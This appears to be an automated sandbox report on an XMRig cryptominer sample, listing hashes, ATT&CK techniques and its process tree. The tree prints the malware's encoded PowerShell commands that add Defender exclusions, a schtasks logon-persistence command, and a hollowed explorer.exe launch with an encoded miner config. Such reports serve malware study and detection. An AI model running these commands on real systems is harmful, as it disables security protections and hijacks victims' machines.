xmrig | 41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27/12/2024, 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
Size

4.0MB
MD5

5fabb9965401cfb8a14fc634a427a98f
SHA1

5c20d202bb4f96ee6506f79a2a2e476ab8386790
SHA256

41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992
SHA512

af91d214cb7f4b069dfe03c448e56059ff19871fd756e463d47bea17804fec68062093694eb9d6c8418be17b07f9ea626fe57620d0c4379d70a3fb2c08ccc0ec
SSDEEP

98304:ZP4w9vjX7YYOls+UHVWvrZtePi5XCZE2VKI5CX:ZPZLsQpHVWvcpVKIY

Score

10^/10

xmrig defense_evasion miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/4616-77-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-79-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-81-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-84-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-83-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-82-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/4616-85-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	services.exe

Executes dropped EXE 2 IoCs

pid	Process
2224	services.exe
3116	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	pastebin.com
18	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2224 set thread context of 4616	2224	services.exe	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3164	powershell.exe
3164	powershell.exe
3984	powershell.exe
3984	powershell.exe
4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
4800	powershell.exe
4800	powershell.exe
1124	powershell.exe
1124	powershell.exe
2224	services.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe
4616	explorer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	2224	services.exe
Token: SeLockMemoryPrivilege	4616	explorer.exe
Token: SeLockMemoryPrivilege	4616	explorer.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 1780	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	83
PID 4476 wrote to memory of 1780	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	83
PID 1780 wrote to memory of 3164	1780	cmd.exe	85
PID 1780 wrote to memory of 3164	1780	cmd.exe	85
PID 1780 wrote to memory of 3984	1780	cmd.exe	86
PID 1780 wrote to memory of 3984	1780	cmd.exe	86
PID 4476 wrote to memory of 4472	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	88
PID 4476 wrote to memory of 4472	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	88
PID 4472 wrote to memory of 544	4472	cmd.exe	90
PID 4472 wrote to memory of 544	4472	cmd.exe	90
PID 4476 wrote to memory of 2464	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	94
PID 4476 wrote to memory of 2464	4476	JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe	94
PID 2464 wrote to memory of 2224	2464	cmd.exe	96
PID 2464 wrote to memory of 2224	2464	cmd.exe	96
PID 2224 wrote to memory of 812	2224	services.exe	97
PID 2224 wrote to memory of 812	2224	services.exe	97
PID 812 wrote to memory of 4800	812	cmd.exe	99
PID 812 wrote to memory of 4800	812	cmd.exe	99
PID 812 wrote to memory of 1124	812	cmd.exe	102
PID 812 wrote to memory of 1124	812	cmd.exe	102
PID 2224 wrote to memory of 3116	2224	services.exe	103
PID 2224 wrote to memory of 3116	2224	services.exe	103
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104
PID 2224 wrote to memory of 4616	2224	services.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3984
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:544
- C:\Windows\SYSTEM32\cmd.exe
  "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\system32\cmd.exe
      "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:3116
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe akovwilknylp0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRhyomsEanimzL+XPt/OnL5zkmhp4OKKV4oWMsUGWdwsoJudug7VIc6ebqddtMoL+8IBSLOtVFEJNctzsbAFCv5LFA0+pkqqr1nCx8fTFBuMw+OLiwo/SsR3rjZo+bft8oJOnArJgxMPdtfn3m4ICAAM3e2n70xyYsrZgv/mIjZ2s9MaWAVhE4vx5zxn4+fM4NxwQhCGRkaMVzSVPxkc4W4VUXCpA4yUlvFPRJn8S+yy9iUUpnGCywwE6cDcLt5DZIDXewj+xO4xE/aANwcdtidmwr0//85B+3VNT5iZiIC3FLzQE/vsUkNT9YQYUOQPjfBnjL7vzm5Q1ckI01V+0GBIlv+bX5ygP0xmeV9VgfPl4NZiC/LoM58JakN7IxZR/9DzCU+xTFYW50R3bR0l6IO+xdIhsG4X3v9YDNU15Qyz9+OxzSQEq5RCbfpWTpQuUofyKsvbLE9Jwpdr18PHoeiHN7tf8MAg8mUIkcnDa9CmC61qEDPq1VUv3vKJsXFBRAqNhhAwMRJW8JWGqkS4GgNVE5biRqbZhwaOTP6eEIlrQ==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
47605a4dda32c9dff09a9ca441417339

SHA1
4f68c895c35b0dc36257fc8251e70b968c560b62

SHA256
e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

SHA512
b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5u3b52mn.23d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe

Filesize
9KB

MD5
8fdd61447409b34bff375dd0e988bb49

SHA1
c8585a53aa833147e4082bef04e401aac0c7c6b1

SHA256
2a8e0532e8255342e6599696a3d354cfde8b511a740427e6c7a37c6970f8f394

SHA512
79fb098910623ba48ab0ff94bbac67f0126b84ffe692c2b3b07bd4cbc3a1ef3787285c870e6f2d3c0b20608903bc4f6625aa2343031afc27057e1d4bece8d337

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\services.exe

Filesize
4.0MB

MD5
5fabb9965401cfb8a14fc634a427a98f

SHA1
5c20d202bb4f96ee6506f79a2a2e476ab8386790

SHA256
41e6c5ccf174a78f6a12af2898bcd7a9cbe8d59cf9d9536747e1194998049992

SHA512
af91d214cb7f4b069dfe03c448e56059ff19871fd756e463d47bea17804fec68062093694eb9d6c8418be17b07f9ea626fe57620d0c4379d70a3fb2c08ccc0ec

Download Submit
memory/3116-76-0x0000000000B20000-0x0000000000B26000-memory.dmp

Filesize
24KB

Download
memory/3164-6-0x0000028E6DE90000-0x0000028E6DEB2000-memory.dmp

Filesize
136KB

Download
memory/3164-19-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/3164-16-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/3164-15-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/3164-4-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4476-36-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4476-0-0x00007FFD9D8C3000-0x00007FFD9D8C5000-memory.dmp

Filesize
8KB

Download
memory/4476-33-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4476-32-0x00007FFD9D8C3000-0x00007FFD9D8C5000-memory.dmp

Filesize
8KB

Download
memory/4476-3-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4476-2-0x00000000012D0000-0x00000000012E2000-memory.dmp

Filesize
72KB

Download
memory/4476-1-0x0000000000510000-0x000000000091E000-memory.dmp

Filesize
4.1MB

Download
memory/4616-80-0x00000000020E0000-0x0000000002100000-memory.dmp

Filesize
128KB

Download
memory/4616-77-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-79-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-81-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-84-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-83-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-82-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/4616-85-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download